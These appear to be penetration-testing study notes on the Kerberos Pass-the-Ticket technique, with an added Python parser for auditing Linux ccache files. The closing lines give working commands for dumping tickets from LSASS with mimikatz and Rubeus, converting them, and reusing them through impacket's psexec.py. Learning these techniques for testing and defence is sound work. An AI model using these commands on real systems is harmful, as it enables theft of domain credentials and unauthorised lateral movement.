5. Pass the ticket
- similar to Pass The Key
- steals an existing ticket instead of requesting a ticket with a known hash
- in Linux, tickets are stored in credential caches (ccache), with 3 main locations:
  - files, /tmp/krb5cc_%{uid} (default)
  - kernel keyrings - a special space in the Linux kernel for storing keys
  - process memory - used when only one process needs to use the ticket
- in Windows, tickets are handled and stored by the LSASS (Local Security Authority Subsystem Service) process, which is responsible for security.
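As an added example (not part of the original notes), here is a small reader for the file-based credential cache named above, /tmp/krb5cc_<uid>, in MIT ccache format version 4. It is written from the auditing side: it tells you which principal a cache belongs to, which service tickets it holds, their flags (the letters klist -f prints) and whether they have expired, without printing key material. The principal names, realm, times and the placeholder key and ticket bytes are constructed sample input, not data from any real system.

```python
import struct
from dataclasses import dataclass

# MIT krb5 ticket-flag bits as stored in the ccache ticket_flags word
# (the same bits that `klist -f` prints as F, R, I).
TKT_FLG_FORWARDABLE = 0x40000000
TKT_FLG_RENEWABLE = 0x00800000
TKT_FLG_INITIAL = 0x00400000


@dataclass
class Credential:
    client: str
    server: str
    enctype: int
    endtime: int
    flags: int
    ticket_len: int

    def flag_string(self) -> str:
        """Letters in the style of klist -f: F forwardable, R renewable, I initial."""
        letters = ((TKT_FLG_FORWARDABLE, "F"), (TKT_FLG_RENEWABLE, "R"), (TKT_FLG_INITIAL, "I"))
        return "".join(ch for bit, ch in letters if self.flags & bit)


class _Reader:
    """Sequential big-endian reader that refuses to run past the end of the data."""
    def __init__(self, data: bytes):
        self.data, self.pos = data, 0
    def take(self, n: int) -> bytes:
        if self.pos + n > len(self.data):
            raise ValueError("truncated ccache")
        chunk = self.data[self.pos:self.pos + n]
        self.pos += n
        return chunk
    def u8(self) -> int: return self.take(1)[0]
    def u16(self) -> int: return struct.unpack(">H", self.take(2))[0]
    def u32(self) -> int: return struct.unpack(">I", self.take(4))[0]
    def counted(self) -> bytes: return self.take(self.u32())   # uint32 length + bytes


def _read_principal(r: _Reader) -> str:
    r.u32()  # name type (1 = NT_PRINCIPAL, 2 = NT_SRV_INST); not needed here
    ncomp = r.u32()
    realm = r.counted().decode()
    comps = [r.counted().decode() for _ in range(ncomp)]
    return "/".join(comps) + "@" + realm


def _read_credential(r: _Reader) -> Credential:
    client = _read_principal(r)
    server = _read_principal(r)
    enctype = r.u16()
    r.counted()  # session key: read past, never returned or printed
    _authtime, _starttime, endtime, _renew_till = (r.u32() for _ in range(4))
    r.u8()       # is_skey
    flags = r.u32()
    for _ in range(r.u32()):  # addresses: addrtype + counted data
        r.u16(); r.counted()
    for _ in range(r.u32()):  # authdata: adtype + counted data
        r.u16(); r.counted()
    ticket = r.counted()
    r.counted()  # second_ticket (empty unless user-to-user)
    return Credential(client, server, enctype, endtime, flags, len(ticket))


def parse_ccache(data: bytes):
    """Return (default principal, [Credential, ...]) for a version-4 FILE ccache."""
    r = _Reader(data)
    if r.take(2) != b"\x05\x04":
        raise ValueError("only ccache format version 4 is handled here")
    r.take(r.u16())  # v4 header tags (e.g. DeltaTime); skipped
    default = _read_principal(r)
    creds = []
    while r.pos < len(data):
        creds.append(_read_credential(r))
    return default, creds


def summarize(data: bytes, now: int) -> list:
    """One dict per ticket: cache owner, service, flag letters, expiry state."""
    default, creds = parse_ccache(data)
    return [{"owner": default, "server": c.server, "flags": c.flag_string(),
             "expired": c.endtime <= now, "enctype": c.enctype} for c in creds]


# --- constructed sample cache (placeholder key and ticket bytes, no real data) ---
def _principal(name_type: int, realm: str, comps: list) -> bytes:
    out = struct.pack(">II", name_type, len(comps)) + struct.pack(">I", len(realm)) + realm.encode()
    for c in comps:
        out += struct.pack(">I", len(c)) + c.encode()
    return out


def _credential(client: bytes, server: bytes, endtime: int, flags: int) -> bytes:
    key = struct.pack(">HI", 18, 32) + bytes(32)            # aes256, all-zero placeholder key
    times = struct.pack(">IIII", endtime - 36000, endtime - 36000, endtime, endtime + 600000)
    ticket = b"constructed-placeholder-ticket"
    return (client + server + key + times + b"\x00" + struct.pack(">I", flags)
            + struct.pack(">II", 0, 0)                        # no addresses, no authdata
            + struct.pack(">I", len(ticket)) + ticket + struct.pack(">I", 0))


NOW = 1_700_000_000  # fixed clock so the sample is reproducible
ALICE = _principal(1, "CORP.LOCAL", ["alice"])
SAMPLE_CCACHE = (
    b"\x05\x04" + struct.pack(">HHHii", 12, 1, 8, 0, 0)       # version 4 + DeltaTime header tag
    + ALICE
    + _credential(ALICE, _principal(2, "CORP.LOCAL", ["krbtgt", "CORP.LOCAL"]),
                  NOW + 3600, TKT_FLG_FORWARDABLE | TKT_FLG_RENEWABLE | TKT_FLG_INITIAL)
    + _credential(ALICE, _principal(2, "CORP.LOCAL", ["cifs", "fs01.corp.local"]),
                  NOW - 60, TKT_FLG_FORWARDABLE)
)

if __name__ == "__main__":
    for row in summarize(SAMPLE_CCACHE, NOW):
        print(row)
```

Pointing parse_ccache at the bytes of a real /tmp/krb5cc_<uid> file gives the same summary klist -f -c would, which makes it easy to script a host check for caches whose owner does not match the file's uid or that hold forwardable TGTs long after the session ended.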
Tools: impacket's psexec.py (Linux), mimikatz & Rubeus (Windows)

In Windows, export the tickets held by LSASS with mimikatz:
    .\mimikatz.exe
    sekurlsa::tickets /export
or use Rubeus to export the tickets:
    .\Rubeus.exe dump

In Kali, perform the Pass The Ticket attack using psexec.py. KRB5CCNAME points the Kerberos libraries (and impacket) at the ccache to use; -k selects Kerberos authentication and -no-pass skips the password prompt:
    export KRB5CCNAME=krb5cc_..
    psexec.py DOMAIN/USERNAME@$IP -k -no-pass

A .kirbi ticket exported on Windows must first be converted to ccache format, with either tool:
    python ticket_converter.py ticket.kirbi ticket.ccache
    kirbi2ccache ticket.kirbi ticket.ccache

Inspect a cache (-f also prints the ticket flags, e.g. forwardable/renewable):
    klist -f -c krb5cc_..